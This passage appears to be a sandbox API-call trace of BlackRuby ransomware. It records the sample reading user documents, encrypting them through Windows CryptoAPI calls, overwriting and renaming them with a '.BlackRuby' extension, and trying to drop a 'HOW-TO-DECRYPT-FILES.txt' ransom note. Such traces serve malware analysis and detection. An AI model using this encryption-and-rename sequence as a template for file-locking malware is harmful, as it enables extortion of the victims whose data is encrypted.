[0058.920] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c04c64*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1c04c64*, pdwDataLen=0x18eb70*=0x10) returned 1 [0058.920] GetLastError () returned 0x0 [0058.920] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c04c94*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1c04c94*, pdwDataLen=0x18eb78*=0x10) returned 1 [0058.920] GetLastError () returned 0x0 [0058.921] CryptDestroyKey (hKey=0x360ea0) returned 1 [0058.921] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.921] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0058.921] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\FM_UMsS.xlsx", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\FM_UMsS.xlsx", lpFilePart=0x0) returned 0x6c [0058.921] GetLastError () returned 0x0 [0058.921] SetErrorMode (uMode=0x1) returned 0x0 [0058.921] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\FM_UMsS.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\fm_umss.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.922] GetLastError () returned 0xb7 [0058.922] GetFileType (hFile=0x184) returned 0x1 [0058.922] SetErrorMode (uMode=0x0) returned 0x1 [0058.922] GetFileType (hFile=0x184) returned 0x1 [0058.924] CloseHandle (hObject=0x184) returned 1 [0058.924] GetLastError () returned 0xb7 [0058.924] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\FM_UMsS.xlsx", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\FM_UMsS.xlsx", lpFilePart=0x0) returned 0x6c [0058.924] GetLastError () returned 0xb7 [0058.924] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_dKKrR9fPdMBUYjtW5PLFY7RFJcLuYELmSnKi8fS2Eq.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_dKKrR9fPdMBUYjtW5PLFY7RFJcLuYELmSnKi8fS2Eq.BlackRuby", lpFilePart=0x0) returned 0x9e [0058.924] GetLastError () returned 0xb7 [0058.924] SetErrorMode (uMode=0x1) returned 0x0 [0058.924] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\FM_UMsS.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\fm_umss.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8998ff30, ftCreationTime.dwHighDateTime=0x1d34b3d, ftLastAccessTime.dwLowDateTime=0xb85ff0d0, ftLastAccessTime.dwHighDateTime=0x1d35182, ftLastWriteTime.dwLowDateTime=0x2b4f7960, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x13a90)) returned 1 [0058.924] GetLastError () returned 0xb7 [0058.924] SetErrorMode (uMode=0x0) returned 0x1 [0058.924] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\FM_UMsS.xlsx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\fm_umss.xlsx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_dKKrR9fPdMBUYjtW5PLFY7RFJcLuYELmSnKi8fS2Eq.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\encrypted_dkkrr9fpdmbuyjtw5plfy7rfjcluyelmsnki8fs2eq.blackruby")) returned 1 [0058.924] GetLastError () returned 0xb7 [0058.925] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x78 [0058.925] GetLastError () returned 0xb7 [0058.925] SetErrorMode (uMode=0x1) returned 0x0 [0058.925] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0058.925] GetLastError () returned 0x5 [0058.926] SetErrorMode (uMode=0x0) returned 0x1 [0058.926] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx", lpFilePart=0x0) returned 0x78 [0058.926] GetLastError () returned 0x5 [0058.926] SetErrorMode (uMode=0x1) returned 0x0 [0058.926] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\g78hickvs4_yu-zx5li.pptx"), fInfoLevelId=0x0, lpFileInformation=0x1c35f28 | out: lpFileInformation=0x1c35f28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98b57c20, ftCreationTime.dwHighDateTime=0x1d3588d, ftLastAccessTime.dwLowDateTime=0xfe63edc0, ftLastAccessTime.dwHighDateTime=0x1d3565f, ftLastWriteTime.dwLowDateTime=0xfe63edc0, ftLastWriteTime.dwHighDateTime=0x1d3565f, nFileSizeHigh=0x0, nFileSizeLow=0xffa1)) returned 1 [0058.926] GetLastError () returned 0x5 [0058.926] SetErrorMode (uMode=0x0) returned 0x1 [0058.926] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx", lpFilePart=0x0) returned 0x78 [0058.926] GetLastError () returned 0x5 [0058.926] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx", lpFilePart=0x0) returned 0x78 [0058.926] GetLastError () returned 0x5 [0058.926] SetErrorMode (uMode=0x1) returned 0x0 [0058.926] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\g78hickvs4_yu-zx5li.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.926] GetLastError () returned 0x0 [0058.926] GetFileType (hFile=0x184) returned 0x1 [0058.926] SetErrorMode (uMode=0x0) returned 0x1 [0058.927] GetFileType (hFile=0x184) returned 0x1 [0058.927] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0xffa1 [0058.927] GetLastError () returned 0x0 [0058.927] ReadFile (in: hFile=0x184, lpBuffer=0x1c382d4, nNumberOfBytesToRead=0xffa1, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1c382d4*, lpNumberOfBytesRead=0x18eb68*=0xffa1, lpOverlapped=0x0) returned 1 [0058.927] GetLastError () returned 0x0 [0058.928] CloseHandle (hObject=0x184) returned 1 [0058.928] GetLastError () returned 0x0 [0058.928] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx", lpFilePart=0x0) returned 0x78 [0058.928] GetLastError () returned 0x0 [0058.928] SetErrorMode (uMode=0x1) returned 0x0 [0058.928] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\g78hickvs4_yu-zx5li.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98b57c20, ftCreationTime.dwHighDateTime=0x1d3588d, ftLastAccessTime.dwLowDateTime=0xfe63edc0, ftLastAccessTime.dwHighDateTime=0x1d3565f, ftLastWriteTime.dwLowDateTime=0xfe63edc0, ftLastWriteTime.dwHighDateTime=0x1d3565f, nFileSizeHigh=0x0, nFileSizeLow=0xffa1)) returned 1 [0058.928] GetLastError () returned 0x0 [0058.928] SetErrorMode (uMode=0x0) returned 0x1 [0058.938] CryptImportKey (in: hProv=0x37c818, pbData=0x1cb267c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360a20) returned 1 [0058.938] GetLastError () returned 0x0 [0058.938] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.938] GetLastError () returned 0x0 [0058.943] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.943] GetLastError () returned 0x0 [0058.943] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360de0) returned 1 [0058.943] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0058.943] GetLastError () returned 0x0 [0058.943] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1cdf6c8*=0x1, dwFlags=0x0) returned 1 [0058.943] GetLastError () returned 0x0 [0058.943] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1cdf694, dwFlags=0x0) returned 1 [0058.943] GetLastError () returned 0x0 [0058.944] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cdf710*, pdwDataLen=0x18eb58*=0x100a0, dwBufLen=0x100a0 | out: pbData=0x1cdf710*, pdwDataLen=0x18eb58*=0x100a0) returned 1 [0058.944] GetLastError () returned 0x0 [0058.944] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cff87c*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1cff87c*, pdwDataLen=0x18eb70*=0x10) returned 1 [0058.944] GetLastError () returned 0x0 [0058.944] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cff8ac*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1cff8ac*, pdwDataLen=0x18eb78*=0x10) returned 1 [0058.944] GetLastError () returned 0x0 [0058.945] CryptDestroyKey (hKey=0x360a20) returned 1 [0058.945] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.945] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0058.945] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx", lpFilePart=0x0) returned 0x78 [0058.945] GetLastError () returned 0x0 [0058.945] SetErrorMode (uMode=0x1) returned 0x0 [0058.945] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\g78hickvs4_yu-zx5li.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.947] GetLastError () returned 0xb7 [0058.947] GetFileType (hFile=0x184) returned 0x1 [0058.947] SetErrorMode (uMode=0x0) returned 0x1 [0058.947] GetFileType (hFile=0x184) returned 0x1 [0058.947] WriteFile (in: hFile=0x184, lpBuffer=0x1cff8dc*, nNumberOfBytesToWrite=0x100b0, lpNumberOfBytesWritten=0x18eb74, lpOverlapped=0x0 | out: lpBuffer=0x1cff8dc*, lpNumberOfBytesWritten=0x18eb74*=0x100b0, lpOverlapped=0x0) returned 1 [0058.948] GetLastError () returned 0xb7 [0058.948] CloseHandle (hObject=0x184) returned 1 [0058.949] GetLastError () returned 0xb7 [0058.949] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx", lpFilePart=0x0) returned 0x78 [0058.949] GetLastError () returned 0xb7 [0058.949] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_pfYrcul6U3a7o9caV6LTla7KBvl3U8gh1R15NIfcSKGO6PV.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_pfYrcul6U3a7o9caV6LTla7KBvl3U8gh1R15NIfcSKGO6PV.BlackRuby", lpFilePart=0x0) returned 0xa3 [0058.949] GetLastError () returned 0xb7 [0058.949] SetErrorMode (uMode=0x1) returned 0x0 [0058.949] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\g78hickvs4_yu-zx5li.pptx"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98b57c20, ftCreationTime.dwHighDateTime=0x1d3588d, ftLastAccessTime.dwLowDateTime=0xfe63edc0, ftLastAccessTime.dwHighDateTime=0x1d3565f, ftLastWriteTime.dwLowDateTime=0x2b543c20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x100b0)) returned 1 [0058.950] GetLastError () returned 0xb7 [0058.950] SetErrorMode (uMode=0x0) returned 0x1 [0058.950] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\g78hiCKVS4_Yu-zx5li.pptx" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\g78hickvs4_yu-zx5li.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Encrypted_pfYrcul6U3a7o9caV6LTla7KBvl3U8gh1R15NIfcSKGO6PV.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\encrypted_pfyrcul6u3a7o9cav6ltla7kbvl3u8gh1r15nifcskgo6pv.blackruby")) returned 1 [0058.950] GetLastError () returned 0xb7 [0058.951] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x78 [0058.951] GetLastError () returned 0xb7 [0058.951] SetErrorMode (uMode=0x1) returned 0x0 [0058.951] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0058.951] GetLastError () returned 0x5 [0058.952] SetErrorMode (uMode=0x0) returned 0x1 [0058.952] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots", lpFilePart=0x0) returned 0x74 [0058.952] GetLastError () returned 0x5 [0058.952] SetErrorMode (uMode=0x1) returned 0x0 [0058.952] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\hm1sbbw3drniwgii.ots"), fInfoLevelId=0x0, lpFileInformation=0x1d2d1d0 | out: lpFileInformation=0x1d2d1d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff9e69e0, ftCreationTime.dwHighDateTime=0x1d359de, ftLastAccessTime.dwLowDateTime=0xd8d6fe20, ftLastAccessTime.dwHighDateTime=0x1d34a94, ftLastWriteTime.dwLowDateTime=0xd8d6fe20, ftLastWriteTime.dwHighDateTime=0x1d34a94, nFileSizeHigh=0x0, nFileSizeLow=0x4272)) returned 1 [0058.953] GetLastError () returned 0x5 [0058.953] SetErrorMode (uMode=0x0) returned 0x1 [0058.953] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots", lpFilePart=0x0) returned 0x74 [0058.953] GetLastError () returned 0x5 [0058.953] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots", lpFilePart=0x0) returned 0x74 [0058.953] GetLastError () returned 0x5 [0058.953] SetErrorMode (uMode=0x1) returned 0x0 [0058.953] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots" (normalized: "c:\\users\\eebsym5\\documents\\ip8 evongvjza\\dp6a j3r7gdp4tj\\tawlsblooj7r\\mzbr1dcvwcm\\8txx7ydxbdh3i\\hm1sbbw3drniwgii.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0058.953] GetLastError () returned 0x0 [0058.953] GetFileType (hFile=0x184) returned 0x1 [0058.953] SetErrorMode (uMode=0x0) returned 0x1 [0058.953] GetFileType (hFile=0x184) returned 0x1 [0058.953] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x4272 [0058.953] GetLastError () returned 0x0 [0058.953] ReadFile (in: hFile=0x184, lpBuffer=0x1d2efa0, nNumberOfBytesToRead=0x4272, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1d2efa0*, lpNumberOfBytesRead=0x18eb68*=0x4272, lpOverlapped=0x0) returned 1 [0058.954] GetLastError () returned 0x0 [0058.954] CloseHandle (hObject=0x184) returned 1 [0058.954] GetLastError () returned 0x0 [0058.954] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A J3R7gDP4Tj\\TAwlSBLOoj7r\\MZBR1DCvwCm\\8txX7YdXBdH3i\\Hm1sbBW3dRNIWgiI.ots", lpFilePart=0x0) returned 0x74 [0058.954] GetLastError () returned 0x0 [0058.954] SetErrorMode (uMode=0x1) returned 0x0 [0058.954] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Ip8 EvOnGvJzA\\dP6A 